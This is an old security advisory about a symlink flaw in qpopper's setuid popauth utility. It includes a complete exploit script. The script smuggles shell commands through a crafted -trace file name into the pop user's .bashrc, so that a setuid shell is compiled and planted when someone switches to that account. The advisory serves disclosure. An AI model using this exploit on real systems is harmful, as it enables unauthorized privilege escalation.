COMMAND

    popauth symlink problem

SYSTEMS AFFECTED

    current version of popauth (packaged with qpopper)

PROBLEM

    Paul Starzetz reported the following:

    There is a symlink problem in the popauth utility, which is part of
    the qpopper package. The binary is often installed suid pop and
    follows symlinks in the -trace file option. This problem was
    reported to vendors in June 2001.

    Impact: in case of suid popauth and a valid shell for user pop, the
    attached script will create a suid-pop shell if someone su's to pop.
    This may happen as part of some automated check script (startup
    script).

    This vulnerability is not very crucial, however it should be
    reported at least once.

    Script (mkbs2.sh)
    =================

    #!/bin/bash

    # popauth symlink follow vuln by IhaQueR
    # this will create .bashrc for user pop
    # and ~pop/sup suid shell

    FILE=$(perl -e 'print "/tmp/blah1\"\ncd ~\necho >blah.c \"#include <stdio.h>\nmain(){setreuid(geteuid(),getuid());execlp(\\\"bash\\\", \\\"bash\\\",NULL);}\"\ngcc blah.c -o sup\nchmod u+s sup\necho done\n\n\""')

    ln -s /var/lib/pop/.bashrc "$FILE"

    /usr/sbin/popauth -trace "$FILE"

SOLUTION

    Nothing yet.